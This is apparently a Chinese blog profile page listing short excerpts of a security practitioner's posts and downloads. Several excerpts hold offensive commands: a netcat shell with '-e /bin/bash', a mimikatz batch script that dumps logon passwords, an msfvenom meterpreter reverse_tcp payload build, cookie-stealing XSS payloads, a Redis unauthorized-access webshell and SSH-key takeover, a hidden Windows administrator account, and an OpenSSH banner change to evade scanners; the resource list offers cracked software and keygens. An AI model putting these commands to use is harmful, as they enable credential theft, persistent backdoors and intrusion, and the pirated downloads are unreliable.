- 博客(20)
- 资源 (9)
- 收藏
- 关注
原创 [4K测试视频] 杜比4K UHD蓝光演示碟 Dolby.UHD.BluRay.Demo.Disc.March.2018.2160p.BluRay下载
杜比4K UHD蓝光演示碟Dolby.UHD.BluRay.Demo.Disc.March.2018.2160p.BluRay下载
2022-02-13 00:43:45
18964
原创 Netcat/nc 备忘
win:https://eternallybored.org/misc/netcat/linux: yum install nc -y常用参数:-l 开启监听-p 指定一个端口-v 显示详细输出-e 指定对应的应用程序-n nc不要DNS反向查询IP的域名-z 连接成功后立即关闭连接-u 指定nc使用UDP协议,默认为TCP-w 超时秒数,后面跟数字服务端:nc -lvp 8888 -e /bin/bash # Linuxnc -lvp ...
2020-07-31 15:59:48
303
原创 Centos 一键升级Openssh版本
Centos 一键升级Openssh版本 该脚本在CentOS 7.6.1810 (Core)x64环境下测试成功 shell远程窗口中直接运行,不会掉线运行前注意检查:① 运行前先本地测试下是否成功!② 检查下脚本中wget下载的文件是否可以完成下载!③ 最后一部修改版本号9.9可以躲过扫描器扫描,按需启用#!/usr/bin/bash#by H Openss...
2020-03-27 12:42:24
996
转载 XSS 跨站测试代码大全2
0x01 XSS介绍1. XSS分类(1) 反射型XSS、(2)存储型XSS、(3)Dom型XSS、(4) 通用型XSS、(全称Universal Cross-Site Scripting,翻译过来就是通用型XSS 简称UXSS) (5) 突变型XSS ( 介绍: mXS()突变 XSS) 是当不可信数据在 DOM 的 innerHTML 属性的上下文被处理并通过浏览器发生突变,...
2019-11-07 17:59:15
1364
转载 在windows下查看某个运行程序(或进程)的命令行参数
使用下面的命令:wmic process get caption,commandline /value如果想查询某一个进程的命令行参数,使用下列方式:wmic process where caption="svchost.exe" get caption,commandline /value这样就可以得到进程的可执行文件位置等信息。...
2019-05-23 16:39:12
5145
原创 mimikatz bat 小记
if %PROCESSOR_ARCHITECTURE%==x86 (cd ./x32) else cd ./x64mimikatz.exe log privilege::debug sekurlsa::logonpasswords exittype mimikatz.log | findstr Passwordpausedel mimikatz.log
2019-05-22 15:09:16
331
原创 CentOS vsftp配置
CentOS vsftp配置yum install vsftpd2.启动/重启/关闭vsftpd服务器[root@localhost ftp]# /sbin/service vsftpd restartShutting down vsftpd: [ OK ]Starting vsftpd for vsftpd: [ OK ]OK表示重启成功了.启动和关闭分别把restart改为s...
2019-04-10 14:19:49
162
原创 Msfvenom
windows:c:\metasploit>msfvenom.bat -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.10.199 LPORT=3080 -e x86/shikata_ga_nai -i 3 -f exe > c:\2.exec:\metasploit>m...
2019-04-04 16:22:09
1580
原创 Linux记录所有用户history
touch/var/local/mon.logchmod 002 /var/local/mon.logvim /etc/profile 最下方添加下面内容:export HISTORY_FILE=/var/local/mon.logexport PROMPT_COMMAND='{ date "+%Y-%m-%d %T ## `hostname` ## $(who am...
2019-03-25 15:38:31
3347
转载 iptables 备忘
#清除自定义的防火墙规则:iptables-F#清除所有的已定义的规则iptables-X#杀掉所有使用者“自定”的chainiptables-Z...
2019-03-20 16:35:28
117
转载 Github RST 文件
RST与Python类似Javadoc与Java,如果下载了别人的Python源码,里面有rst文件夹,我们可以转为html后用浏览器打开,具体为:安装python的sphinx模块:pip install sphinx,我装的anaconda,其中已经有了,那么在cmd中进入rst的父文件夹,输入:sphinx-build -b html doc builddoc是含有r...
2019-03-13 15:15:15
2380
转载 CentOS 6.9/7通过yum安装指定版本的MySQL
一、安装# wget http://repo.mysql.com/mysql57-community-release-el6.rpm && rpm -ivh mysql57-community-release-el6.rpm# yum install -y mysql-community-server备注:http://repo.mysql.com这个站点上就是放置rpm源...
2019-03-12 16:07:53
211
转载 Linux 删除恢复
1:打开文件分区 dfdebugfs: open /dev/sda12:查看当前文件夹下可以恢复的所有文件列表debugfs: ls -d /home/linux/shl/sy_linux/3:找到对应的参数带入命令debugfs: logdump -i <2165564> -f 34:退出debugfs,开始恢复文件 bs与offset值一致,skip与blo...
2019-02-28 17:59:43
294
转载 APACHE 访问日志切割
日志一直记录总有一天会把整个磁盘占满,所以有必要让它自动切割,并删除老的日志文件把虚拟主机配置文件改成如下:<VirtualHost *:80> DocumentRoot "/data/wwwroot/111.com" ServerName 111.com ServerAlias www.111.com SetEnvIf Request_URI "...
2019-02-27 17:04:31
455
转载 XSS 跨站测试代码大全
'><script>alert(document.cookie)</script>='><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulne
2019-02-26 11:24:34
524
转载 Redis入侵小结
如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell: 开启redis客户端 输入以下命令来连接远程redis redis-cli -h 125.39.185.150 -p 6379 接下来,在远程redis内存中设置数据: config set dir /var/www/html(在内存中设置切换的web目录/var/www/html)...
2019-02-26 11:20:48
345
转载 Redis未授权访问缺陷可轻易导致系统被黑
漏洞概要Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件...
2019-02-26 11:13:07
458
转载 关于Redis未授权访问漏洞修复
【漏洞概述】Redis 默认情况下,会绑定在 0.0.0.0:6379,导致Redis服务暴露到公网上。如果在没有开启认证并且在任意用户可以访问目标服务器的情况下,从而可以未授权访问Redis服务,进一步可进行数据增删改查,甚至获取服务器权限等恶意操作。 【风险等级】 高风险 【漏洞风险】主机被远程控制,泄漏敏感业务数据; 【漏洞利用条件】1. Re...
2019-02-26 11:05:42
8270
原创 隐藏Windows中的用户
方法一: 点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net user 123$ 123456 /add”,回车,成功后会显示“命令成功完成”。接着输入“net localgroup administrators 123$ /add”回车,这样我们就利用“命令提示符”成功得建立了一个用户名为“123$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提升为了
2008-09-02 23:38:00
547
乌云内部工具 Extensible Web Attack Framework
2019-04-03
Xshell-6.0.0109r.exe 加 Xftp-6.0.0105r.exe 加 注册机
2019-02-28
Xshell-6.0.0109r 加 Xftp-6.0.0103 加注册教程
2018-12-27
HttpWatch Professional Edition 7.2.13 破解版(带正版lic)
2013-03-30
IBM http请求编辑器(IBM Rational HTTP Request Editor V1.0)
2013-01-04
NetLimiter 3 Pro 正式版破解文件
2011-11-29
冰舞2.5ASP网站漏洞扫描工具
2011-05-10
Pangolin_Professinal_Edition_3.2.4.1132_CracKed.rar
2011-04-22
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人